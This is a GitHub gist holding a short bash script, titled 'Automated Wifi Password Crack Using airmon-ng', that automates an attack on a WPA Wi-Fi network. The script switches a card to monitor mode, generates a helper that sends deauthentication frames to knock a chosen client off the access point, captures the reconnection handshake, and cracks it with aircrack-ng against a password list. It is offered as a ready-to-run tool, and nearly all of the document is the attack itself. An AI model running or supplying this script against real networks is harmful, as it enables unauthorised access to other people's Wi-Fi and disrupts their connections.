Created
May 18, 2018 08:25
-
-
Save ketankr9/c28f8b75c0339cb654fa2304c4fffa1f to your computer and use it in GitHub Desktop.
Automated Wifi Password Crack Using airmon-ng
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# start in monitor mode | |
airmon-ng start wlan0 | |
# dump all traffic data | |
airodump-ng wlan0mon | |
# start capturing packets, looking for deauth | |
# -c channel of AP | |
# --bssid router to crack i.e., AP | |
echo "Enter AP: "; read AP | |
echo "Enter Client: "; read CL | |
echo "Enter channel: "; read CH | |
cat > deauth.sh <<EOF | |
#!/bin/bash | |
aireplay-ng -0 1 -a "$AP" -c "$CL" wlan0mon | |
EOF | |
chmod +x deauth.sh | |
# save packets dump in .cap file, press ctrl+c when a handshake is captured. | |
# On parallel execute ./deauth.sh to manually force clients to re-auth. | |
airodump-ng -c "$CH" --bssid "$AP" -w psk wlan0mon | |
# Crack from password list | |
aircrack-ng -w testPass.lst -b "$AP" psk*.cap | |
# stop | |
airmon-ng stop wlan0mon |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment